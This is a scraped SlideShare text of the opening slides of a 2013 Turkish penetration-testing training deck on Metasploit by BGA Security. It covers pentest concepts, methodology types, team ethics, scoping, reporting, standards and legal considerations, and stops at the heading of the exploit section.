SlideShare uma empresa Scribd logo
1 de 255
@BGASecurity
BGA	|	Metasploit
@BGASecurity
Metasploit	Framework	Pentest Eğitimi
2013
@BGASecurity
BGA	|	Metasploit
@BGASecurity
BGA	Bilgi	Güvenliği	A.Ş
BGA	Security	Hakkında
BGA	|	Hakkında
Siber	güvenlik	dünyasına	yönelik,	yenilikçi	
profesyonel	çözümleri	ile	katkıda	bulunmak	
amacı	ile	2008	yılında	kurulan	BGA	Bilgi	
Güvenliği	A.Ş.	stratejik	siber	güvenlik	
danışmanlığı	ve	güvenlik	eğitimleri	konularında	
büyük	ölçekli	çok	sayıda	kuruma	hizmet	
vermektedir.	
Gerçekleştirdiği	vizyoner danışmanlık	projeleri	
ve	nitelikli	eğitimleri	ile	sektörde	saygın	bir	yer	
kazanan	BGA	Bilgi	Güvenliği,	kurulduğu	günden	
bugüne	kadar	alanında	lider	finans,	enerji,	
telekom ve	kamu	kuruluşları	ile	1.000'den	fazla	
eğitim	ve	danışmanlık	projelerine	imza	atmıştır.	
ARGE
EĞİTİM
MSSP
PENTEST
SOME	/	SOC
SECOPS
@BGASecurity
BGA	|	MetasploitEğitim	Hakkında
Metasploit	Framework	Pentest	Eğitimi,	pentest	çalışmalarının	en	önemli	adımlarından	olan	sistemlere	sızma	ve	ilerleme	
süreçlerinin	nasıl	gerçekleştirildiğini,	sonuçlarını	ve	kullanılan	araçları	uygulamalı	olarak	anlatan	eğitimdir.
@BGASecurity
BGA	|	MetasploitEğitim	Notları
• Tamamen	Türkçe	ve	BGA	eğitmenleri	tarafından	hazırlanmıştır.
• Kitabi	şekilde	değil	sunum	şeklindedir.
- Okunması	ve	anlaşılması	daha	kolay	olduğu	için
• Bazı	konu	başlıkları	sadece	eğitim	notlarında	yer	almaktadır(self	study).
• Eğitmen	notları	ile	katılımcı	notları	aynı	değildir.	Katılımcı	notları	çok	daha	detay	içermektedir.
• Eğitim	notları	ile	ilgili	geri	bildirimleriniz	için	egitim@bga.com.tr adresine	e-posta	gönderebilirsiniz.
@BGASecurity
BGA	|	MetasploitTanışma
@BGASecurity
BGA	|	MetasploitParola:Ezber	Değil	Mantık
@BGASecurity
BGA	|	MetasploitDers	Program
@BGASecurity
BGA	|	MetasploitEğitim	Neler	İçerir/Neler	İçermez
Eğitim	Neler	İçerir
Metasploit	araçlarının	etkin	kullanımı,	hacking	öncesi	ve	sonrası	yardımcı	araçları,	exploiting	sonrası	çalışacak
payloadları	ve	hedef	sistemde	yetki	yükseltme,	ilerleme,	iz	silme	gibi	konular	gerçek	dünyada	örneklerle	uygulamalı
olarak	işlenmektedir.
Eğitim	Neler	içermez;
Güvenlik	zafiyetini	ortaya	çıkarma,	exploit	geliştirme,	ShellCode	ve	Payload	yazımını	içermez.	Bu	konular	için	bakınız:	
Exploit	Geliştirme	Eğitimi.
@BGASecurity
BGA	|	MetasploitHatırlatmalar
• Programların	arayüzü değişir,	komut	satırına	aşinalık	gösterin.
• Not	almakdan kaçının,	eğitim	notlarında	ve	kaynaklarda	fazlaca	detay	var.	Uygulamaya	ağırlık	gösterin.
• Eğitim	ileri	düzey	uygulamalı	bir	eğitimdir,	yaşanacak	teknik	sorunlar	bu	eğitimin	bir	parçasıdır.	
Çözümleyici	ve	uzlaşıcı	yaklaşımlar	gösteriniz.
• Eğitim	boyunca,	ses	ve	video	kaydı	almak	yasaktır	!
@BGASecurity
BGA	|	MetasploitLab.	Ortamı
• İşletim	sistemleri,	vmware veya	virtualbox sanallaştırma	ortamlarında	kullanılacaktır.
• Win2k8,	Win2k3,	Win7,	Winxp,	Linux,	FreeBSD,	MacOSX işletim	sistemleri	lab.	ortamında	kuruludur.
• Çalışmalar,	Backtrack5	R2	dağıtımı	üzerinde	yapılacaktır.
• Switc ve	router ihtiyaçları	için	gns3lab	kullanılacaktır.
@BGASecurity
BGA	|	MetasploitEğitim	İçeriği
• Exploit	Nedir ?
• Exploit	Türleri
• Örnek Exploitler
• Exploit	Frameworkleri
• Payload	Nedir?
• Shellcode Nedir ?
• Encoder	Nedir ?
• Nop Nedir ?
• Auxiliary	Nedir?
• Metasploit Framework	Projesi
• Metasploit Kurulumu
• Gelişmiş	Payload	ve	Eklenti	Modülleri
• Auxiliary	Modülleri
• Metasploit	Araçlarını	Anlamak
• Metasploit	Framework	ile	Pen-Test
• Dradis	Framework
• Client	Side	Saldırı	Yöntemleri
• Exploit	Sonrası	Sistemde	Nasıl	İlerleriz	?
• Erişimi	Sürdürme	Yöntemleri
• İleri		Metasploit	Kullanımı
• Metasploit	Ötesi	Hacking	Araçları
@BGASecurity
BGA	|	MetasploitKontrol	Listesi
• Vmware (workstation veya	player )	kurulumu
• DHCP	ile	IP	Adresi	alındı	mı	?
• İfconfig -a
• İnternet	bağlantınız	var	mı	?
• Ping www.google.com
• Windows	kullanıcıları	vmware yazılımını	administrator hakları	ile	Linux	kullanıcıları	root yetkileri	ile	
çalıştırdı	mı	?
@BGASecurity
BGA	|	Metasploit
@BGASecurity
I.Bölüm	Pentest
@BGASecurity
BGA	|	MetasploitGenel	Kavramlar
Pentest,	Penetration	Test,	Vulnerability	Assessment,	audit,	configuration	review,	White/Black/Gray	box	
pentest,	white/black	hat	hacker,	ddos,	phishing,	social	engineering,	metasploit,	port	scanning,	os	
fingerprinting,	service	identification,	vulnerability,	exploit,	scr1pt	k1dd13,	google	hacking,	ip	fragmentation,	
nessus,	nmap,	metasploit,	osstmm,	issaf,	heap,	stack,	dep,	kernel,	rootkit,	web	shell,	tunneling…
@BGASecurity
BGA	|	MetasploitBilişim	Sektöründe	Pentest
Bilişim Dünyası
Güvenlik
Audit
Pentest
Firewall/IPS
Ağ Yönetimi ….
@BGASecurity
BGA	|	MetasploitPenetration	Test/PenTest	
• Çeşitli	yazılım	ve	yöntemler	kullanarak	hedef	sistemlere	sızma	girişimlerine	
verilen	ad
• Literatürde	Sistem	sızma	testleri/güvenlik	testleri	olarak	da	geçer.
• «Gerçek	pentest»lerde	hedef	sisteme	sızmak	için	her	 yol	meşrudur.
• Hackerlar	için
• Sosyal	yaşamdaki	karşılığı
• Askeri	tatbikatlar
• Siber	tatbikatlar(?)
@BGASecurity
BGA	|	MetasploitVulnerability	Assessment
• Zaafiyet	Analizi/	Zayıflık	Taraması
• Otomatize	araçlar	kullanarak	sistem	güvenliğinin	teknik	açıdan	incelenmesi	ve	raporlanması
• Uzman	seviye	teknik	bilgi	gerektirmez
• False	positive	seviyesi	önemlidir
• Otomatize	araçlar	akıllı	sistemler	değildir
• Rapor	çok	detaylı	olursa	gerçek	riski	bulmak	o	kadar	zor	olur
• eksik	yama,	hatalı	konfigürasyon,		güvenlik	zafiyeti	barındıran	yazılım	versiyonu	bulmak	için	
yapılır
• Gerçekleştirmek	kolay,	sonuçlarını		yorumlamak	zordur
• Örnek	rapor:	MSSQL’de	X	zaafiyeti	var?	Sonrası…
@BGASecurity
BGA	|	MetasploitVA	Neden	Yetersizdir?
• Otomatize	araçlar	kullanılarak	gerçekleştirildiği	için	gerçek	riski	ortaya	çıkarmaz
• Saldırgan	sisteminize	ne	zarar	verebilir	sorusunu	cevaplayamaz!
• Test	edilen	sistem/bileşenler	arasında	ilişki	kuramaz	
• Firewall’daki	X	portu	açık,	Y	sisteminde		Z	zaafiyeti	var.
• X	portundan	Y	sistemine	erişilip	sistem	ele	geçirilebilirken	VA	sistemi	her	iki	zaafiyeti	farklı	farklı	bildirir.
• Çeşitli	sebeplerden	dolayı	hatalı	sonuçlar	üretebilir
• Varsayılan	ayarlarla	kullanıldığında	false	negative	oranı	artar
• Kötü	adamlar	nessus kullanmaz
• Bir	saldırganın	ağınıza	yönelik	neler	yapabileceğini	göstermez.
• Bileşenler	arası	güven	ilişkilerinin	nasıl	kötüye	kullanılacağını	
göstermez.
• False positive ihtimali	yüksektir.
• Elle	doğrulanması	gerekir.
• Sınırları	belirlidir.
• Tek	bir	sisteme	yöneliktir,	bir	sistemden	başka	sistemlere	etkiyi	
göstermez.
• VA	pentest için	bir	baseline sağlar.
@BGASecurity
BGA	|	MetasploitPentest	&	Vuln.	Asses.	Farkı
• Zaafiyet	taramada	amaç	teknik	güvenlik	açıklıklarının	bulunmasıdır.
• Genellikle	yüzeysel	testlerdir
• Pentest’de	amaç	gerçek	hayattakine	benzer	şekilde	sistemleri	ele	geçirmeye	çalışmaktır
• Birinde	yazılım	diğerinde	tecrübe	söz	sahibidir
• Zaafiyet	tarama	Pentest	çalışmalarının	
Bir	kısmını	içerir
• Pentest	KAPSAR	Vuln.Assessment
@BGASecurity
BGA	|	MetasploitAudit
• Tetkik,	denetim
• Sistemlerin	yazılı	bir	dökümana	bağlı	kalarak	detaylı	bir	şekilde	gözden	geçirilmesi	ve	
uygunsuzlukların	saptanması	
• Genellikle	bir	standarta	uyumluluk	için	gerçekleştirilir	ve	kontrol	listeleri(checklists)	kullanılır
• En	fazla	bulguyu	ortaya	çıkaran	yöntemdir
• Uzman	seviyesi	teknik	bilgi	gerektirmez
• Düz	bakış	açısı	olduğu	için	kompleks	zaafiyetleri	bulmak	zordur
@BGASecurity
BGA	|	MetasploitPentest,	Vuln.	As.,	Audit	Karşılaştırması
Pen Test Vuln Assess Audit
Verilen
Bilgi/Yetki
Sınırlı/Sınırlı Sınırlı/Sınırsız Sınırsız/Sınırsız
Sonuçları Sisteme sızma,
iç ağa erişim
Zaafiyetlerin
listelenmesi
Sistem
uygunsuzlukları
Lokasyon İç ve Dış Dışarıdan Sistem üzeri
Zaman Orta Kısa Uzun
@BGASecurity
BGA	|	MetasploitNeden	Pentest?
• Internetten	gelecek	siber	saldırılara	karşı	ne	kadar	korunaklısınız?
• Modern	risk	ölçümü	
• Checklist	tabanlı	kontroller	zaman	aşımına	uğrar(Audit)
• Çoğu	şirket	güvenlik	sertifikalarını(iso	27001	vs
kağıt	üzerinde	almak	için	uğraşır
-Türkiye'den	güncel	örnek	
• Standartlar	kompleks	tehditlere	karşı	yetersiz	kalmaktadır.
• PCI,	HIPAA	gibi	standartlar	Pentest	yaptırmayı	zorunlu	tutmaktadır
• Teori	ile	pratik	arasındaki	fark	teori	ile	pratik	arasındaki	fark	kadardır!
@BGASecurity
BGA	|	MetasploitPentest	ROI(ROI(Return	Of	Investment)
• Pentest	projeleri	genellikle	«ek	masraf»	kategorisindedir
• Bunun	temel	sebebi	Pentest	projelerinin	üst	yönetime	iyi	anlatılamamasıdır
• Kazanç	odaklı	bakış	açısı:	Başkaları	benim	sistemleri	test	edip	zaafiyetlerimi	söylediğinde	ben	ne	kazanacağım?
• El-cevap:	Başkaları	sistemdeki	zaafiyetleri	kullanarak	sisteme	sızarsa	ne	kaybederiz?
• Para?
• Prestij?
• Güç?
• Pentest	projeleri	yapılırken	mutlaka	bunun	şirkete	olan	katkısı	ön	plana	çıkarılmalıdır
@BGASecurity
BGA	|	MetasploitPentest	Çalışmalarında	Sık	Yapılan	Hatalar
• Pentest'i	sadece	çeşitli	araçlar	kullanarak	zaafiyet	tarama	şeklinde	geçiştirme
• Test	kapsamı	belirlenirken	çeşitli	sistemleri	hariç	tutma
• Özellikle	bu	sistemler	internete	açıksa	...
• Kontrol	testlerinin	eksik	bırakılması
• Ucuz	iş	gücünün	seçilmesi
• Ucuz	iş	gücü	=	otomatize	zaafiyet	tarama	sonuçları
• İstemci	güvenliğine	yönelik	testler	ve	sosyal	mühendislik	testleri	genellikle	önemsenmemektedir.
• Sınır	güvenliği	bileşenleri	teste	tabi	tutulmamaktadır
• Firewall,	IPS,	WAF	vs.
@BGASecurity
BGA	|	MetasploitPentest Hakkında	Eksik/Yanlış	Bilinenler
• Pentest yaptırmak	sistemlerin	güvenliğini	arttırır
• Dolaylı	yoldan	arttırır
• Pentes'i bir	kere	yaptırmak	yeterlidir
• Pentest çalışmasını	iç	kaynak	kullanarak	yaptırmak	daha	güvenlidir
• Pentest hackerların ne	bulabileceğini	bize	gösterir
• Hackerların sınırı	yoktur,	kapsamı	yoktur
• En	önemli	sistemlerimi	pentestden geçirmek	yeterlidir.
@BGASecurity
BGA	|	MetasploitPentest	Çalışmalarında	Amaç?
• Gerçek	riskin	teknik	olarak	ortaya	çıkarılmasıdır
• Sadece	zaafiyetlerin	bulunup	bırakılması	değildir!
• Türkiye’deki	pentest	projelerinin	%99’u	vuln.	Asses.	olarak	değerlendirilmektedir.
@BGASecurity
BGA	|	MetasploitPentest Paradox
• Pentest sonuçları	iki	taraftan	birini	mutlu	diğerini	mutsuz	edecektir.
• Pentest çalışmalarını	bir	challenga dönüştürmemek	lazım.
• Pentest'de amaç	gerçek	riskin	ortaya	çıkarılmasıdır.	Bulunan	açıklar	pentest firmasını	sevindirdiği	kadar	
firmayı	da	sevindirmeli	(başkaları	bulmadan	önce	bulduk	diye)
• Pentest sonuçları	%100	güvenilir	değildir.
• Pentest ekiplerinin	moral	ve	motivasyonu	Pentest amacı	üstte	tutularak	devamlı	kontrol	edilmeli	ve	moral	
depolanmalı
@BGASecurity
BGA	|	MetasploitPentest	Yöntemleri
Pentest
Black BOX White BOX Gray BOX
@BGASecurity
BGA	|	MetasploitBlacbox	Pentest	Yöntemi
• Teste	tabi	tutulacak	sistem	hakkında	ip	adresi,	kurum	ismi	vs	gibi	temel	bilgiler	haricinde	ek	bilgi	
bulunmaması
• Amaç:	dışardan	bir	göz	sistemle	ilgili	neler	görebilir,	nerelere	ulaşabilir
• En	gerçekci	güvenlik	test	yöntemidir
• Çok	tercih	edilmez
• Neden?
• Hackerların	zaman	kısıtı	yoktur,	pentest	projelerinde	zaman	kısıtlaması	vardır
@BGASecurity
BGA	|	MetasploitWhitebox	Pentest	Yöntemi
• Teste	tabi	tutulacak	sistemlere	ait	tüm	detay	bilgilerin	paylaşılması
• Kaynak	kodlar
• İç	ip	yapılanması
• Hangi	sistemlerin	hangi	yazılımlarla	çalıştığı	bilgisi
• İşletim	sistemi	bilgileri
• En	fazla	bilgi	bu	test	sonucunda	ortaya	çıkar
• Tam	bir	pentest	gibi	sonuç	vermez
• Neden?
• Detay	bilgi	olması	testi	yapanların	körelmesi	demektir
@BGASecurity
BGA	|	MetasploitGraybox	Pentest	Yöntemi
• White	box	ve	black	box	testlerin	arasında	konumlanan	test	yöntemi
• Teste	tabi	tutulacak	sistemlere	ait	bilgilerin	paylaşılır	fakat	testin	yine	agresif	yöntemlerle	yapılması	
sağlanır
• Sık	tercih	edilen	yöntemlerdendir.
@BGASecurity
BGA	|	MetasploitMeslek	Olarak	«Pentest»
• Zengin	işi(!)
• Zor	aynı	zamanda	zevkli
• Bitmek	bilmeyen	bir	okuma	ve	deneme	serüveni
• Sistem/ağ	admin			=	%20	araştırma	%80	operasyon
• Pentester =	%80	araştırma	%20	operasyon
• En	az	bir	konuda	uzmanlık(Networking,	DB,	development,	system	adm.	…)	gerektirir
• Her	konuda	uzmanlaşmak	mümkün	değildir
• Uzmanlık:	Ortalama	4-5	yıl	bir	konu	üzerinde	çalıştıktan	sonra	kazanılır
• Araçlar	hayat	kurtarıcıdır	ama	herşey	değildir!
• Perl,	Python,		Ruby	gibi	programlama	dillerinden	birine	hakimiyet.
@BGASecurity
BGA	|	MetasploitPentest	Ekipleri	Nasıl	Olmalı?
• Pentest	ekip	işidir
• En	az	üç	kişiden	oluşmalıdır
• Proje	yöneticisi	(+bir	konuda	uzman)
• Yedekli	çalışma(1+1)
• Her	konuda	uzman	kişi	bulmak	imkansız
• Web+veritabanı+networking+exploit	geliştirme+….
• Tek	kişiden	oluşan	pentest	ekipleri	çok	kabul	görmez
• Türkiye’de	genellikle	tek	kişilik	pentest	ekipleri	iş	yapar
• Ekip	çalışmalarında	mutlaka	bir	metodoloji	takip	edilmeli
• Ekiplerin	çalışma	süresince	bulgularını	paylaşacakları	ortam/yazılım	gereksinimi
• Dradis	pentest	framework	gibi.
• Red	team	blue	team	vs	tiger	team
@BGASecurity
BGA	|	MetasploitPentest	Ekibi	Nasıl	Kurulur
• Pentest	ekipleri	hem	hizmet	veren	hem	de	kurumsal	şirketler	için	gereklidir
• En	az	3	yıllık	güvenlik	sektörü	deneyimi
• Eğitimler	hızlandırıcı	rol	oynar	
• En	az	bir	programlama	diline	hakimiyet	olmalı
• Kurulacak	ekip	için	uzmanlık	alanlarına	göre	yol	haritası	belirlenmeli
• Merak	en	önemli	unsurdur!
@BGASecurity
BGA	|	MetasploitPentest Ekibi	Özellikleri
• En	önemli	bileşen	etik	değerlere	olan	bağlılıktır.	
• Etik>Bilgi	değerlidir.
• Ekiplerin	pentest çalışması	ve	edinilen	bilgilerle	ilgili	hassasiyeti	çok	derin	olmalı.
• Kötü	örnek:	pentest çalışmasında	e-posta	listelerine	gönderilen	maillerde	firmaya	ait	bilginin	bulunması.
• Pentest yöneticisinin	onayı	olmadan	pentest kapsamıyla	ilgili	LAN	haricinde	bilgi	paylaşımının	
gerçekleştirilmemesi.
• 3-4	kişilik	ekip	olabilir.	Gerektiğinde	bilgi	olarak	danışılabilecek	dışardan uzmanlar...
• Pentest ekiplerinin	ön	bir	eğitimden	geçmesi	gerekir.	(Teknik	olarak	değil)
@BGASecurity
BGA	|	MetasploitBaşarılı	Pentest	İçin	Üç	Bileşen
Tecrübe
Yorumlama
Araç kullanımı
@BGASecurity
BGA	|	MetasploitPen-test	Çeşitleri
Pentest
İç	Pentest	 Dış	Pentest Hibrid	Pentest
@BGASecurity
BGA	|	Metasploitİç(Internal)	Pentest
• Amaç:	Şirket	içinden	birinin	veya	şirketin	iç	ağına	sızabilen	birinin	neler	yapabileceğinin	ortaya	çıkartılması
• Şirket	çalışanlarına	yönelik	saldırıları
• Sosyal	mühendislik	saldırıları
• Phishing	saldırıları
• Şirket	çalışanlarının	yapabileceklerinin	simule	edilmesi
@BGASecurity
BGA	|	Metasploitİç	Pentestlerde	Sık	Yapılan	Hatalar
• Ağ	altyapı	güvenliğinin	test	edilmemesi
• Ağ	altyapısı	güvenli	değilse	üzerine	çalışan	uygulamalarda	güvenlik	önlemi	almak	işe	yaramaz
• MITM	tehlikesi	olan	bir	ağda	WEB	sunucuya	yama	geçilmesi	çok	önemli	değildir.	
• Öncelik	ağ	altyapısının	güvenliği	olmalıdır.
@BGASecurity
BGA	|	MetasploitDış(External)	Pentest
Network
Pentest
Wireless
Pentest
Client
Side
Pentest
DDoS
Test
Web
App.
Pentest
Şirketin	dışardan	risk	haritasının	çıkartılması	amaçlı	gerçekleştirilir.
Hangi	pentest	daha	önemlidir?	Web?	Network?	Wireless?	….
@BGASecurity
BGA	|	MetasploitDış	Pentestlerde	Sık	Yapılan	Hatalar
• DDoS	testlerinin	gerçekleştirilmemesi
• DDOS=	erişilebilirlik=Güvenliğin	en	temel	amacı!
• Kapsam	dışı	bırakılan	sistemler
• Hackerlar	için	kapsam	kavramı	yoktur!
@BGASecurity
BGA	|	MetasploitPentest Teknik	Konu	Başlıkları
• Web	Application Pentest
• Network	Pentest
• Wireless Pentest
• Mobile	System/Application Pentest
• Cloud/Virtulization Pentest
• DDoS Pentest
• Client Side	Pentest
@BGASecurity
BGA	|	MetasploitPentest	Öncesi	Yapılması	Gerekenler
• Firewall,	ips	den	izin
• Zorunlu	değildir
• Firmanın	kalitesi	ölçülmek	isteniyorsa	Firewall/IPS	‘den	«özel»	izin	verilmemelidir
• Şirket	içi	bilgilendirme	mailleri	toplantisi	ve	kontaklar
• Kapsam	belirleme	amaçlı	toplantılar
• Pentest	yapılacak	zaman	dilimlerini	belirleme
• DDoS	testleri	gece	saatlerinde	gerçekleştirilmeli
• Kişisel	firewall/güvenlik	sistemlerinin	devre	dışı	bırakılması
@BGASecurity
BGA	|	MetasploitKapsam	Belirleme
• Saldırganlar	için	kapsam	kavramı	yoktur
• Hattı	müdafaa	değil	sathı	müdafaa	yapılmalıdır	(o	satıh	tüm	sistem	olmalıdır)
• Envanter	çalışması
• Kapsamı	pentest	firmasının	çıkarması
• Kapsam	çalışmasında	müşteriye	ve	pentest	firmasına	düşen	görevler	nelerdir?
@BGASecurity
BGA	|	MetasploitKapsam	Belirlemede	Yardımcı	Sorular
• İç	test	mi	dış	test	mi?
• Wireless	var	mı?
• Şirketin	online	kalması	elzem	mi?
• En	önemli	veri	nedir?
• Müşteri	verileri	var	mı?
• İç	ağa	misafirler	geliyor	mu?
• Şirketi	medyaya	çıkaracak	haberler	ne	olabilir?
@BGASecurity
BGA	|	MetasploitKapsam	İçi	Fakat	Şirket	Dışı	Sistemlerin		Durumu
• Firmanın	verdiği	kapsam	içerisinde	firmaya	ait	olmayan	sistemler	olabilir
• Mail	sunucu	hosting	firmasında	tutuluyordur	gibi..
• Bu	durumlarda	hosting	ile	firmanın	görüşülmesi	daha	uygundur
• Görüşmeleri	pentest	firması	değil	hizmet	alan	firma	gerçekleştirmelidir
@BGASecurity
BGA	|	MetasploitFull Scope Pentest(a.k.a	Hack Us!)
• Pentest gerçekletirecek firmaya	sadece	firma	isim		ve	ana	sayfa	bilgisi	verilir.
• Süre	kısıtlıdır
• Amaç	tüm	bilgiler	ve	sistemler	kullanılarak	internet	üzerinden	sisteme	sızma	gerçekleştirilebiliyor	mu	
sorusunun	cevabını	bulmak
• Amaç	açıklık	bulmak	değil,	bulunan	açıklıklardan	sistemlere	sızma	deneyimleridir
• Raporu	diğer	pentest çalışmalarına	göre	daha	kısa	olur
• Gereksiz	detaylar	çıkarılarak	sadece	sisteme	sızmaya	izin	verecek	bileşenler	yazılır
@BGASecurity
BGA	|	MetasploitPenetration	Test		Zamanı
• Sistemi	aksatabilecek	tüm	testler	çalışma	saatleri	dışında	gerçekleştirilmeli
• Testler	başladığında	mutlaka	test	yapan	firmadan	bir	kontak	olmalı
• Aksaklıkların	anında	bildirilmesi	için
@BGASecurity
BGA	|	MetasploitFirmanın	Yetkinliği	Nasıl	Ölçülür
• Pentest	yapacak	firmanın	yetkinliği	test	sonuçlarının	güvenilir	olması	açısından	oldukça	
önemlidir
• Pentest	yaptırdıktan	sonra	hacklenirse	sistem	kim	sorumlu	olur?
• Firma	Yetkinliği	belirleme	için	temel	yöntemler:
• Pentest	ekibinin	CV’si
• Daha	önce	pentst	yapılan	firmalar	(referanslar)
• Tuzak	sistem	kullanarak
@BGASecurity
BGA	|	MetasploitFirma	Seçimi	Konusunda	Dikkat	Edilecek	Hususlar
• Pentest	projesinin	en	önemli	adımlarından	biridir
• Seçilen	firma	ne	kadar	kaliteliyse	ortaya	çıkacak	rapor	da	o	oranda	sağlıklı	olur.
• Pentest	sonrası	hacklenen	şirketler…?
• Penetration	test	firmanın	özel	işi	mi	yoksa	oylesine	yaptığı	bir	iş	mi?
• Firmaya	daha	önceki	referanslarını	sorun	ve	bunlardan	birkaçına	memnuniyetlerini	sorun.
• Firmadan	daha	önce	yaptığı	testlerle	ilgili	örnek	raporlar	isteyin.
• Firmada	test	yapacak	çalışanların	CVlerini	isteyin	
http://blog.lifeoverip.net/2009/10/06/10-soruda-pentestpenetrasyon-testleri/
@BGASecurity
BGA	|	MetasploitPentest’de Yapılmayacaklar	Listesi
• Brute force denemelerini	dikkatli	gerçekleştirmek	gerekir.
• Hesap	kitleme	riski		olan	yerlere	yönelik	brute force denemeleri	kontrollü	gerçekleştirilmeli
• Sistemlerde	bulunan	açıkları	istismar	için	exploit çalıştırmadan	önce	test	sistemlerinde	mutlaka	
denenmeli
• Bazı	exploitler sistemin	çalışamaz	hale	gelmesine	neden	olabilir
• MITM	denemeleri
• İzin	almadan	gerçekleştirilecek	MITM	denemeleri	networkün çalışmas hale	gelmesine	neden	olabilir
• Test	kapsamında	dışardan firma	izni	olmadan	üçüncü	partileri	teste	dahil	edip	sistemlere	erişim	izni	
vermek
@BGASecurity
BGA	|	MetasploitExploit Çalıştırma	Denemesi
Sistem	
Crash
@BGASecurity
BGA	|	MetasploitPentest Lab İhtiyacı
• Pentest çalışmalarında	riskli	denemeler	için	lab ortamının	hazır	olması		gerekir.
• BGA	Pentest lab ortamında	45	adet	makine	bulunmaktadır.	
• Bu	makineler	her	tür	işletim	sistemi	ve	yazılımın	sürümlerini	içermektedir.	
• Bir	sürümdeki	zafiyet	önce	lab ortamında	denenir	ve	sisteme	zarar	vermediği	belirlenirse	gerçek	
ortamlarda	denenir.
@BGASecurity
BGA	|	MetasploitPentest	Sonrası	Yapılacaklar	Listesi
• Pentest	projelerinin	en	önemli	kısmı	sonuçların	değerlendirilmesidir.
• Aynı	açıklık	3	sene	boyunca	farklı	pentest	sonuçlarında	gözüküyorsa	testler	sadece	yapılmış	demektir.
• Pentest	raporlarının	üst	yönetimle	paylaşılarak	açıklıkların	giderilmesinde	yönetim	desteğinin	alınması.
• Sistem	yöneticileri/yazılımcılarla	toplantı	yapıp	sonuçların	paylaşılması
• Sonuçlarının	basit	açıklıklar	olarak	değil,	bir	risk	haritası	kapsamında	yönetime	sunulması(bu	açıklık	
hackerlar	tarafından	değerlendirilirse	şu	kadar	kaybımız	olur	gibisinden)
• Her	bilgi	aynı	değerde	olmadığı	gibi	her	zaafiyet	de	aynı	değer	de	değildir.
• Açıklıkların	kapatılmasının	takibi
• Bir	sonraki	pentestin	tarihinin	belirlenmesi
@BGASecurity
BGA	|	MetasploitPentest	Raporlaması
• Pentest	verilerinin	mutlaka	diskte	şifreli	olarak	saklanması	gerekir
• Örnek	olay:
• Pentest	raporlarının	ilgili	kişiye	iki	aşamalı	şifre	ile	iletilmesi	gerekir.
• E-posta+SMS,	telefon	üzerinden	şifre
@BGASecurity
BGA	|	MetasploitMetodoloji
• Pentest sonuçlarında	firmanın	size	olan	güvenini	arttırmaya	yarar.	
• Neleri	nasıl	kontrol	ettiğinizin	belgesidir.
• Kötü	örnek:	neleri	kontrol	ettiği	bilinmiyor	ortada	birşey yok
• Neleri	kontrol	ettiği	biliniyor	ve	ortada	birşey yok	(daha	güvenilir	bir	rapor)
• Pentest gerçekleştirilen	firmanın	bilgi	seviyesini	sorgulamak	pentest aşaması	veya	rapor	zamanında	
yapılmaz
• Başka	firmalardan	alınacak	metodolojiler	geliştirilebilir.
• Yaşayan	bir	döküman olmalı
@BGASecurity
BGA	|	MetasploitPentest	Standartları
• Pentest	sonuçlarının	tekrarlanabilir	ve	doğrulanabilir	olması	için	standartlara	uyumlu	olması	gereklidir.
• Pentest	konusundaki	standartlar
• OSTTM(Open	Source	Security	Testing	Methodology	Manual)
• ISSAF(Information	Systems	Security	Assessment	Framework)
• OWASP
• NIST	SP800-115
• EC	Council’s LPT
• Penetration	Testing	Framework	
• http://www.vulnerabilityassessment.co.uk/
@BGASecurity
BGA	|	MetasploitOSSTMM
• Open-Source	Security	Testing	Methodology	Manual
• Version	2.0	->		www.osstmm.org
• Teknik	detaylara	çok	girmeden	bir	pentest	sürecinin	nasıl	yürütülmesi	gerektiğini	anlatır.
• Teorik	dökümandır
• Her	pentest	yapan	uzmanın
Bilmesi	gereken	maddeleri	içerir.
@BGASecurity
BGA	|	MetasploitOWASP
• Owasp	testing guide
• Teknik	detay	içermez	yol,	yöntem	göstermek	amaçlıdır
• Sadece	uygulama	testlerine	yöneliktir.
@BGASecurity
BGA	|	MetasploitISSAF	
ISSAF
(Information	
Systems	Security	
Assessment	
Framework	)
@BGASecurity
BGA	|	MetasploitVuln.Ass.Co.uk
@BGASecurity
BGA	|	MetasploitPentest	Proje	Planı	
• Pentest	çalışmasından	max.	Fayda	elde	edebilmek	için	öncelikle	sağlam	bir	plan	yapılmalıdır
• Plan	için	şu	sorular	kullanılabilir:
• Pentest’in	kapsamı	ne	olacak?
• Sadece	iç	ağ	sistemleri,	uygulamaları	mı	yoksa	tüm	altyapı	mı	test	ettirmek	isteniyor
• Testleri	kime	yaptıracağım?
• Ne	kadar	sıklıkla	yaptırmalıyım?
• Riskli	sistem	ve	servisler	kapsam	dışı	olmalı	mı	yoksa	riski	kabul	edip	sonucunu	görmeli	miyim?
• DDOS	denemesi	yapılacak	mı?
• Firma	ile		NDA	anlaşması
@BGASecurity
BGA	|	MetasploitPremature Termination
• Pentest çalışmasının	belirlenenden	önce	bitirilmesine	neden	olabilir?
• Çalışmalar	kapsamında	networksel ve	sistemsel	problemlerin	oluşması
• IDS	vs	sistemlerinde	ciddi	alarmların	üremesi
• Sistemlerdeki	kişilere	gereksiz	onlarca	mailin	gitmesi
• Sisteme	girdiğinizi	bilen	firmanın	tamam	yeter	demesi
• Sisteme	girdiğinizde	sisteme	daha	önceden	birilerinin	girdiğinin	farkedilmesi!!
• Acil	açıklık	keşifleri
• Firma	tarafında	gerçekleştirilebilecek	sistem	çalışmaları
@BGASecurity
BGA	|	MetasploitGüvenlik	Testlerinin	Yasal	Durumu
• Güvenlik	taraması	yapmak	suç	mudur?
• Başkalarının	sistemlerini	öğrenme	amaçlı	kurcalama
• T.C.K	ve	bilişim	suçları	
• NDA	imzalanması
• Yasal	pentestlerde	ilk	yapılması	gereken	işlem
• Her	iki	tarafı	da	ek	yükümlülüklerden	korumak	içindir.
• Sayfanızda	açıklık	buldum	diyen	birine	karşı	verilecek	cevap:
• Teşekkür	&	uyarı
• Hukukü	süreç	başlatma
@BGASecurity
BGA	|	Metasploit
@BGASecurity
II.Bölüm	
Exploit	Çalıştırma
@BGASecurity
BGA	|	MetasploitSistemlere	Sızma	Yöntemleri
• Günümüzde	açıklıklar	yoğun	olarak	network	seviyesinde	iki	port üzerinde	gözükmektedir	
(80/443)
• Uygulama	seviyesi	güvenlik	zafiyetleri	kullanılarak	işletim	sistemi,	LAN	ve	DMZ	bölgeleri	ele	
geçirilebilir.	
• Gerekli	önlemler	alınmadığı	durumlarda
• Sistemlerde	açıklık	bulma,	açıklığı	istismar	etme	ve	sistemi	ele	geçirme	farklı	adımlardır	ve	farklı	
alanlarda	uzmanlık	ister.
@BGASecurity
BGA	|	MetasploitExploit|Genel	Kavramlar
